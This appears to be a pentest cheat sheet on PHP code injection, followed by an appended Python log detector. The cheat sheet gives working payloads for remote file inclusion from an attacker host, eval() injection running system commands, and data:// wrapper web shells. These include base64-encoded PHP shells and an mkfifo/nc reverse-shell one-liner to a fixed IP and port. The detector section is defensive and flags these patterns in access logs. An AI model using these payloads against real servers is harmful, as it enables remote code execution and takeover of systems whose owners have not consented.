💰Code Injection (RCE)
Scenario 1: PHP include() function
In this scenario, the PHP include() function is in use with no input validation.
http://vulnerable-site.com/?path=support.php

To exploit the vulnerability, we store our payload on an external server and point the parameter at it, so the vulnerable server fetches the external file and executes it:

http://vulnerable-site.com/?path=http://attacker-website/payload.php
----------------------------------------------------------------
Scenario 2: PHP eval() function
In this example, the vulnerable PHP eval() function is in use. eval() provides a quick and convenient way of executing string values as PHP code, especially in the initial phases of development or for debugging, and it is what makes the code injection possible. The source code looks like the following:

<?php eval ("echo ".$_REQUEST["parameter"].";"); ?>

The parameter is passed in the URL as follows:

http://vulnerable-site.com/?parameter=value

An attacker who is aware that eval() is in use (which can be revealed via error messages) can send the following payload to exploit the vulnerability:

http://vulnerable-site.com/?parameter=value;phpinfo();

If successful, phpinfo() is executed after the parameter value has been echoed and reveals the server's configuration details.

Moreover, if the system() function is also enabled, the attacker can execute arbitrary commands:

http://vulnerable-site.com/?parameter=value;system('ls -l');
----------------------------------------------------------------
RCE (reverse shell) by using the PHP data:// wrapper in an LFI path parameter (file=):

data://text/plain;base64,<?php system($_GET['cmd']);echo 'Shell Executed Successfully!!!'; ?>
data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ZWNobyAnU2hlbGwgRXhlY3V0ZWQgU3VjY2Vzc2Z1bGx5ISEhJzsgPz4=

data://text/plain;base64,<?php system($_GET['cmd']);?>
cmd=ls
data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7Pz4=
cmd=ls

data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7Pz4=
cmd=rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|bin/sh -i 2>&1|nc 192.168.102.129 5555 >/tmp/f
-------------------------------------------------------------
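The three scenarios above (remote include, eval() injection, data:// wrapper in an LFI parameter) all leave distinctive traces in the web server access log. The following detector, added here as an example and not part of the original page, parses combined-format log lines and flags those patterns; the parameter names (path, file, parameter) and the sample log lines are constructed for this illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Hypothetical parameter names this app feeds to include() and eval() (taken from the scenarios above).
INCLUDE_PARAMS = {"path", "file"}
EVAL_PARAMS = {"parameter"}

# Remote or stream-wrapper inclusion targets: RFI via http://, and data:// / php:// wrappers.
WRAPPER_RE = re.compile(r"^\s*(?:https?|ftp|data|php|expect|phar)://", re.IGNORECASE)
# Statement separator followed by a PHP function call, as in "value;phpinfo()".
EVAL_INJECT_RE = re.compile(r";\s*[A-Za-z_][A-Za-z0-9_]*\s*\(")
# Combined log format (Apache/nginx); only the client IP and the request target are used.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})')

def analyse_request(target: str) -> list[str]:
    """Return findings for one request target (path plus query string)."""
    findings = []
    query = parse_qs(urlsplit(target).query, keep_blank_values=True)
    for name, values in query.items():
        for raw in values:
            value = unquote(raw)  # second decode catches double-encoded payloads
            if name in INCLUDE_PARAMS and WRAPPER_RE.match(value):
                findings.append(f"{name}: remote/wrapper include target {value[:40]!r}")
            if name in EVAL_PARAMS and EVAL_INJECT_RE.search(value):
                findings.append(f"{name}: injected PHP call {value[:40]!r}")
    return findings

def scan_log(lines):
    """Return (client_ip, findings) for every log line that has at least one finding."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if m and (findings := analyse_request(m["target"])):
            hits.append((m["ip"], findings))
    return hits

# Constructed sample log lines (not real traffic) mirroring the three scenarios above.
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /?path=support.php HTTP/1.1" 200 512',
    '203.0.113.5 - - [10/Oct/2023:13:55:40 +0000] "GET /?path=http://attacker-website/payload.php HTTP/1.1" 200 120',
    '198.51.100.7 - - [10/Oct/2023:13:56:01 +0000] "GET /?parameter=value%3Bphpinfo()%3B HTTP/1.1" 200 9001',
    '198.51.100.7 - - [10/Oct/2023:13:56:09 +0000] "GET /?file=data://text/plain;base64,PD9waHA%3D&cmd=ls HTTP/1.1" 200 88',
]

if __name__ == "__main__":
    for ip, findings in scan_log(SAMPLE_LOG):
        print(ip, *findings, sep="\n  ")
```

The detector flags attempts whether or not they succeeded: the remote and data:// inclusions only execute code when allow_url_include is enabled, so a hit against a hardened host still shows who is probing and is worth reviewing.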